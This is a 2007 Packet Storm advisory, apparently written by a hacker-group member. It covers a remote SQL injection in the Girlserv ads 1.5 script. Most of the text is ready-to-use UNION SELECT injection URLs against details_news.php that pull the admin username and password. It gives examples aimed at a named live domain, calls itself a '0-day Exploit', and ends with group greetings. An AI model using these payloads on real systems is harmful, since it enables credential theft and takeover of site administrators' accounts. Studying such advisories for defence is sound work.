girlserv-sql.txt

2007-07-07T00:00:00
ID PACKETSTORM:57488
Type packetstorm
Reporter Cold z3ro
Modified 2007-07-07T00:00:00

Description

                                        
                                            `Girlserv ads <= 1.5 Remote SQL Injection Vulnerability  
  
Found By : Cold z3ro , Cold-z3ro@hotmail.com  
  
Homepages : http://hackteach.org , http://h4ps.com  
  
Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip  
  
For Admin :  
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*  
For password :  
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*  
  
Example ;  
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*  
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*  
  
=================================================  
0-day Exploit :)  
=================================================  
Greets : Hackteach members , Pal-hacker.com admins , xp10.com members , and  
All friend  
=============================================  
Cold !F iT z3ro , No One Equal One  
=============================================  
  
#Long life Palestine  
#http://hackteach.org  
  
`